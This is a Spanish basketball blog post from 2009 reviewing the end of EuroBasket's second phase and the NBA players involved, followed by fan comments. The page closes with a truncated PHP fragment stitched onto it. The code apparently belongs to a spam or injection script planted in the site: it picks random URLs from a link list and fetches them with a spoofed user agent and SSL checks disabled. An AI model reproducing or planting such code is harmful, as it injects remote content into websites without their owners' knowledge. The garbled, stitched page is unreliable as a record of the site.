EuroNBAsket: Fin de la 2ª fase

17 de September de 2009 por TheDeerHunter

España aplastó a Polonia en la última jornada de la 2ª fase. Lástima de final para un campeonato muy digno de los locales. El mundo baloncestístico debería redescubrir a Marcin Gortat que ha demostrado tener muchos más recursos de los que se dejan ver en Orlando… y que puede ser que no haya sido tan descabellado el contrato que le han firmado. Desgracidamente para ellos, los anfitriones han terminado acusando una rotación excesivamente corta.

La ÑBA, en cambio, cada vez está más suelta. Pau Gasol estuvo demoledor en su papel de líder y eso que todavía no está al 100% y se nota, cómo no, defensivamente. Pero en ataque estuvo imparable ante un rocoso defensor como es Gortat. El hermanísimo Marc disfrutó de muchos minutos pero no termina de encontrarse a si mismo. 7 fallos de 11 intentos dejan claro en qué estado de confianza se encuentra. De todas formas tantos minutos deben ser un paso más en su recuperación, que contra Francia podría ser tan decisiva. Por parte de España también brilló especialmente NBarro, que por fin vio el aro como una plaza de toros. 7 triplacos, el máquina. Los Lakers pueden soñar…

Ya se temían lo peor los franceses el otro día cuando tras la canasta de la victoria contra la mismísima Grecia  no hubo felicitaciones ni abrazos. Alguna sonrisa se les escapó a los griegos, que no debería ser tanta ahora que se van a partir la cara con los rocosos otomanos. Poco se puede analizar de este “amistoso”. Sólo que ambos van a resultar rivales muy duros en la parte del cuadro donde ha caído España.

Como ya hemos dicho, los turcos se complicaron tremendamente la vida en el último partido, cayendo por fin contra Eslovenia en el enésimo final apretado y se las verán en cuartos contra los griegos. El mejor de los turcos, una vez más, Ersan Ilyasova, con unos fantásticos 16 puntos, 7 rebotes, 4 asistencias, 1 robo y un tapón. Pero echó de menos una mejor contribución del resto, sobre todo de Turkoglu que se quedó en 12 puntos con malos porcentajes de tiro. De los NBA eslovenos, no hubo una excelsa actuación de Brezec, jugando únicamente 13 minutos, ni tampoco de Goran Dragic que no jugó ni un minuto por segundo partido consecutivo y no nos consta que sufra ningún problema físico. Los eslovenos se han ganado disfrutar de los cuartos a priori más plácidos contra Croacia.

Del resto de NBAs que siguen vivos en el campeonato hay que destacar la buena actuación de Krstic (16-4) en la victoria cómoda de Serbia ante Lituania (los serbios se enfrentarán a Rusia) y la sensacional actuación para cerrarnos las bocas de Ukic, con 18 puntos, 4 rebotes, 3 asistencias y 1 robo.

MVP: Tal y como se las vió Croacia contra Alemania para no caer eliminados, ganando únicamente por 2 puntos, es justo reconocer que la actuación más importante para su equipo fue la de Roko-Leni Ukic. Ójala fuera capaz siempre de demostrar su inmenso talento el croata.

La Sorpresa: Algunos ya lo habíamos dado por defenestrado para el campeonato a Roko… doble premio para él hoy.

La decepción: Hay varias. Francia se las tendrá que ver con los subcampeones olímpicos como premio por un campeonato inmaculado… como lo había sido hasta la fecha para los turcos. Turkoglu personaliza el jugador más decepcionante de las últimas jornadas. De todas formas uno no deja de pensar que precísamente son los próximos partidos los que mejor le van.

El mayor esfuerzo en vano: Marcin Gortat se despidió ayer de la competición con un 12-12, tras un campeonato dignísimo del “tapado” sustituto de Supermán. Menudo juego interior si Van Gundy logra sacarles rendimiento juntos.

Comenta

6 comentarios a esta entrada

  1. Kiki dice:
    #1

    Bueno, ahora queda lo mejor del Eurobasket. El mal juego de España y sus dos derrotas ante Serbia y Turquía hace que nos enfrentemos a los únicos invictos, Francia.
    Vaya arsenal tienen, como dice Oscar. Pero de las bajas sólo se echan de menos de verdad a M. Pietrus (menos mal que no está…), Diawará y tal vez Petro o Ajinca, para tener más defensa e intimidación, que tampoco les sobra tanto juego interior. Un cinco con Parker-Pietrus-Batum-Diaw-Petro no estaría nada mal…
    A por ellos, que son pocos y flojitos…. madre mía que acongoje…

      Citar

  2. Txusma dice:
    #2

    Hombre, flojitos lo que se dice flojitos no los veo…

      Citar

  3. toni dice:
    #3

    Yo tampoco los veo demasiado flojitos y menos aun cuando miras el casillero de derrotas…
    Pero España no debe achicarse ni amoldarse al juego frances, debe imponer su ritmo y su juego.
    ¡Empieza lo serio señores!

      Citar

  4. Angel dice:
    #4

    Hola!. En principio, los franceses no son rival para una selección española fuerte, pero ya sabemos como se está desarrollando el Eurobasket para España. Una de las claves va a estar en lo que permitan repartir los árbitros, porque los franceses no son técnicamente muy buenos, pero físicamente son bestias.

    Por cierto, juego interio Gortat – Howard… no se como lo vereis vosotros pero para mi son totalmente incompatibles… Ninguno la metería en una paellera desde más de 3 metros.

    Saludos!!

      Citar

  5. couxe dice:
    #5

    Bueno, menuda barrida la que le metimos ayer a los franceses… Si es que cuando nos ponemos a jugar así…

    Yo más o menos tenía claro que estando bien nosotros, ellos no tenían demasiado que hacer salvo que Parker se saliese… pero un chavalín llamado Ricky, hizo lo que casi nadie en la Nba ha conseguido, desquiciar a un tal Tony Parker asfixiándolo en defensa, y provocando que tras el descanso no quisiera prácticamente ni salir a la cancha… Y todavía hay gente que duda de su calidad…

    Por otro lado, descomunal Gasol con 28 puntos 9 rebotes y 3 tapones en 28 minutos… impresionante lo que ha crecido a lo largo del torneo tanto en defensa como en ataque, y que poco a poco va recuperando su mejor forma y demostrando que en el mundo FIBA prácticamente no tiene rival…
    El resto del equipo también ha estado muy bien en general (muy bien otra vez más Rudy), con una intensidad defensiva enorme a pesar de puntuales errores de posición, y trabajando en ataque bien, aunque quizás se abusó un poco en determinados momentos del tiro exterior…

    Ahora toca esperar rival para las semifinales, que saldrá del ganador del partido entre Grecia y Turquía…
    No tengo un favorito claro para este partido, aunque si pudiera escoger rival, elegiría a Turquía, más que nada porque los jugadores puedan tener un puntito más de extramotivación de cara a devolverles nuestra última derrota…

      Citar

  6. Txusma dice:
    #6

    Buff… ahora si que veo a esta seleccion campeona de Europa. La barrida de ayer fue tremenda y como dices el papel de Ricky defendiendo a Parker fue supremo. Es tan joven que hemos de presuponer que aprendera a jugar en estatico y mejorar su tiro exterior. Si lo hace, tendremos base para rato. Aquí y en la NBA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>